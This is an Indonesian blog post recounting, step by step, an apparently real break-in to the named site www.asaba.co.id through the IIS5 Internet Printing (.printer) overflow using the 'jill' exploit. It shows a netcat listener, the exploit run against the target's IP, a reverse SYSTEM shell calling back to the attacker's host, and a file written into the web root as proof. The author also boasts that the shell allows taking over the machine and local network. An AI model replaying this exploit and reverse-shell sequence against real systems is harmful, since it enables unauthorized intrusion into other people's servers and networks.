Exploitasi
www.asaba.co.id melalui Web Printing
Bukan !
*@#&*&@ ini bukan unicode. Inilah contoh nyata dari exploitasi melalui
web printing dari artikel sebelumnya oleh saya dan djava8zi jadi bisa dikatakan
sebagai artikel versi ke 3. Karena banyaknya yang menanyakan tentang bagaimana
exploitasi dari web printing ini maka dengan ini saya akan memberikan contoh
nyata dari exploitasi ini dan semoga semua pertanyaan bisa terjawab.
Seperti yang telah di
terangkan pada 2 artikel sebelumnya kita akan melakukan exploitasi berdasarkan
keterangan yang telah diberikan sehingga saya tidak perlu lagi memberikan anda
keterangan tentang bug ini terlalu jauh. Berikut adalah tampilan dari sisi
listening windows (note : saya menjalankan ini semua melalui windows 2000
profesional sebagai bantahan atas banyak pernyataan yang mengatakan anda harus
menggunakan linux)
Microsoft Windows
2000 [Version 5.00.2195]
(C) Copyright
1985-2000 Microsoft Corp.
C:\>f:
F:\>cd jill
F:\Jill>nc -l -p
33 -vv
listening on [any] 33
...
Kemudian saya
menjalankan lagi windows ke 2 dengan jill
Microsoft Windows
2000 [Version 5.00.2195]
(C) Copyright
1985-2000 Microsoft Corp.
C:\>f:
F:\>cd jill
F:\Jill>jill
www.asaba.co.id 80 202.152.24.101 33
iis5 remote .printer
overflow.
dark spyrit / beavuh
labs.
connecting...
sent...
you may need to send
a carriage on your listener if the shell doesn't appear.
have fun!
F:\Jill>
Dari windows pertama
kemudian saya menjalankan perintah :
F:\Jill>nc -l -p
33 -w
listening on [any] 33
...
202.155.6.162:
inverse host lookup failed: h_errno 11004: NO_DATA
connect to
[202.152.24.101] from (UNKNOWN) [202.155.6.162] 5576: NO_DATA
Microsoft Windows
2000 [Version 5.00.2195]
(C) Copyright
1985-2000 Microsoft Corp.
C:\WINNT\system32>cd\inetpub\wwwroot
cd\inetpub\wwwroot
C:\Inetpub\wwwroot>echo im Here > news.txt
Kini selesailah sudah
tugas sederhana ini, dimana tentu saja dengan berbagai macam teknik dan karena
anda mempunyai hak system banyak yang bisa dilakukan seperti mengambil alih
seluruh komputer bahkan jaringan yang lokal bisa anda dapatkan. Ngak percaya ?
;) karena anda masuk dengan shell semacam telnet anda bisa melakukan banyak
sekali hal yang jauh lebih berbahaya daripada bug unicode. Sebagai bukti dari
file yang telah di buat anda bisa melihat ke alamat :
http://www.asaba.co.id/news.txt
Note : Kami tidak merusak data maupun hal-hal lain
yang merugikan, kejadian-kejadian diluar ini atas dipublikasikannya artikel ini
adalah diluar tanggung jawab kami.
0 komentar:
Posting Komentar